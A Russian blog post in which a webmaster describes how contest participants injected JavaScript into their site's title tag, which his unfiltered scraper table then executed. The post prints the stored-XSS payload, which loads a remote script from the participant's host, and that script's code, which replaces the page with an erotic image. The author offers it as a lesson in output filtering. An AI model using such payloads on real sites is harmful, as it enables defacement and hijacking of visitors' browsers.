На днях над моей табличкой конкурсантов, некоторые участники конкурса слегка поглумились — воткнули вместо таблицы с информацией обнаженную девушку — правильно сделали, раз уж парсишь — при выводе не забывай фильтровать !
Кому интересно и кто не в курсе — раскрою подробности процедуры:
Взглянув на табличку видно, что в ней выводится содержимое, сграбленного тега title — ну и некоторые ребята, решили проверить — фильтруется ли вывод, али нет 🙂
На denejno.ru в тег был вставлен JS код с подключением стороннего js файла.
А конкретно такой код
|
1 2 3 4 5 6 7 8 9 10 11 12 |
<title>Денежно.Ру <script> var scid=document.createElement(‘SCRIPT’); scid.type=‘text/javascript’; scid.charset=‘windows-1251’; scid.src=‘http:/’+‘/denejno.ru/f.js?rnd=’+Math.random(); document.body.appendChild(scid); </script> <noscript> </title> </noscript> </title> |
На искомой странице скрипт не выполнялся, т.к. был внутри тега title. А в моей табличке — как раз пошел на выполнение 🙂
JS код подключаемого файла:
|
1 2 3 4 |
document.body.innerHTML=‘ <div align=»center»> <img src=»http://adamast.ru/images/all/erotic/adamast_ru_pic1261418007.jpg» alt=»» width=»900″ border=»0″> </div>’; |
Спасибо хоть девчёнку симпотную поставили, а не член в пол-экрана — хорошая наука на будущее. А то как обычно — быстро, на коленке и в эфир. Теперь буду повнимательнее и не так ленив на счёт фильтрации, чего и всем желаю.